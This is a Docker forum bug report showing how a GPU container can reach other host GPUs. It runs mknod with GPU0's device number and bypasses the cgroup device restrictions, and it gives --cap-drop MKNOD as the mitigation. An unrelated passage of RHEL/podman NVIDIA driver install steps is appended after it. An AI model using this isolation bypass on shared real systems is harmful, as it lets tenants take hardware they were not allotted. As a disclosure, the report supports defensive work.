Docker Community Forums

Share and learn in the Docker community.

GPU container can get the permission of other GPUs on the host

1. Issue description

The GPU container can break the isolation to get the permission of other GPUs on the host

2. Steps to reproduce the issue

start a GPU container, and attach /dev/nvidia0

$ docker run -it -e NVIDIA_VISIBLE_DEVICES=0  nvidia/cuda:10.1-runtime-ubuntu16.04 bash

the container can access the GPU as expected

root@5f0921a756de:/# nvidia-smi
Wed Nov  4 07:50:56 2020
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
| N/A   26C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

the cgroup setup c 195:0 rw is also as expected

root@5f0921a756de:/# cat /sys/fs/cgroup/devices/devices.list
c 1:5 rwm
c 1:3 rwm
c 1:9 rwm
c 1:8 rwm
c 5:0 rwm
c 5:1 rwm
c *:* m
b *:* m
c 1:7 rwm
c 136:* rwm
c 5:2 rwm
c 10:200 rwm
c 195:255 rw
c 236:0 rw
c 236:1 rw
c 195:0 rw

BUT
if I create other GPU device files with GPU0’s major/minor number, something unexpected will happen.

root@5f0921a756de:/# mknod -m 666 /dev/nvidia1 c 195 0

the /dev/nvidia1 with the nvidia0 's device number create successfully

root@5f0921a756de:/# ll /dev/nvidia*
crw-rw-rw- 1 root root 236,   0 Oct  9 01:33 /dev/nvidia-uvm
crw-rw-rw- 1 root root 236,   1 Oct  9 01:33 /dev/nvidia-uvm-tools
crw-rw-rw- 1 root root 195,   0 Oct  9 01:32 /dev/nvidia0
crw-rw-rw- 1 root root 195,   0 Nov  4 08:15 /dev/nvidia1
crw-rw-rw- 1 root root 195, 255 Oct  9 01:32 /dev/nvidiactl

the GPU1 can be listed by nvidia-smi unexpectedly

root@5f0921a756de:/# nvidia-smi
Wed Nov  4 08:20:45 2020
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
| N/A   26C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
|   1  Tesla V100-PCIE...  Off  | 00000000:03:00.0 Off |                    0 |
| N/A   29C    P0    25W / 250W |      0MiB / 32510MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+

and the cgroup setup doesn’t change at all

root@5f0921a756de:/# cat /sys/fs/cgroup/devices/devices.list
c 1:5 rwm
c 1:3 rwm
c 1:9 rwm
c 1:8 rwm
c 5:0 rwm
c 5:1 rwm
c *:* m
b *:* m
c 1:7 rwm
c 136:* rwm
c 5:2 rwm
c 10:200 rwm
c 195:255 rw
c 236:0 rw
c 236:1 rw
c 195:0 rw

I have run a tensorflow demo in the container, these 2 GPUs can indeed be used.

This problem can be avoid be add arg --cap-drop MKNOD for docker run , but docker container has the MKNOD cap by default.

And it seems like this operation can trick cgroup to get the permission of other GPUs on host.

It’s a big risk.

Host Preparation
First, install the necessary container tools to run containers on the host.

yum -y install podman

NVIDIA Driver Installation
NVIDIA drivers for RHEL must be installed on the host as a prerequisite for using GPUs in containers with podman. Let’s prepare the host by installing NVIDIA drivers and NVIDIA container enablement. See the install guide here.

NVIDIA drivers need to be compiled for the kernel in use. The build process requires the kernel-devel package to be installed.

yum -y install kernel-devel-uname -r kernel-headers-uname -r

The NVIDIA driver installation requires the DKMS package. DKMS is not supported or packaged by Red Hat. Work is underway to improve the packaging of NVIDIA drivers for Red Hat Enterprise Linux. DKMS can be installed from the EPEL repository.

First install theEPEL repository. To install EPEL with DKMS on RHEL 7

yum -y install https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm

yum -y install dkms

To install EPEL with DKMS on RHEL 8

yum -y install https://dl.fedoraproject.org/pub/epel/epel-release-latest-8.noarch.rpm

yum -y install dkms

The newest NVIDIA drivers are located in the following repository. To install the CUDA 10.2 repository on RHEL7

yum -y install http://developer.download.nvidia.com/compute/cuda/repos/rhel7/x86_64/cuda-repo-rhel7-10.2.89-1.x86_64.rpm

To install the CUDA 10.2 repository on RHEL8

yum -y install http://developer.download.nvidia.com/compute/cuda/repos/rhel8/x86_64/cuda-repo-rhel8-10.2.89-1.x86_64.rpm

Remove the nouveau kernel module, (otherwise the nvidia kernel module will not load). The installation of the NVIDIA driver package will blacklist the driver in the kernel command line (nouveau.modeset=0 rd.driver.blacklist=nouveau video=vesa:off), so that the nouveau driver will not be loaded on subsequent reboots.

modprobe -r nouveau

There are many CUDA tools and libraries. You can install the entire CUDA stack on the bare metal system

yum -y install cuda

Or, you can be more selective and install only the necessary device drivers.

yum -y install xorg-x11-drv-nvidia xorg-x11-drv-nvidia-devel kmod-nvidia-latest-dkms

Load the NVIDIA and the unified memory kernel modules.

nvidia-modprobe && nvidia-modprobe -u

Verify that the installation and the drivers are working on the host system.

nvidia-smi --query-gpu=gpu_name --format=csv,noheader --id=0 | sed -e ‘s/ /-/g’

Tesla-V100-SXM2-16GB